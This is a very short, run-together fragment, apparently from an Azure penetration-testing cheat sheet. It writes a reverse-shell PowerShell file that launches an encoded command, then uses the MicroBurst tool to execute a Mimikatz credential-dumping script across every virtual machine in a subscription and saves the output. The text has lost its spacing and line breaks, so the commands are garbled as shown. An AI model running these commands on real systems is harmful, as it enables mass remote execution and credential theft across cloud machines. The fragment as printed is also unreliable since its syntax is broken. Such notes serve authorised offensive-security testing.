# The content ofecho"powershell.exe -EncodedCommand $encodedCommand">revshell.ps1# Try to run in every machineImport-moduleMicroBurst.psm1Invoke-AzureRmVMBulkCMD-ScriptMimikatz.ps1-Verbose-outputOutput.txt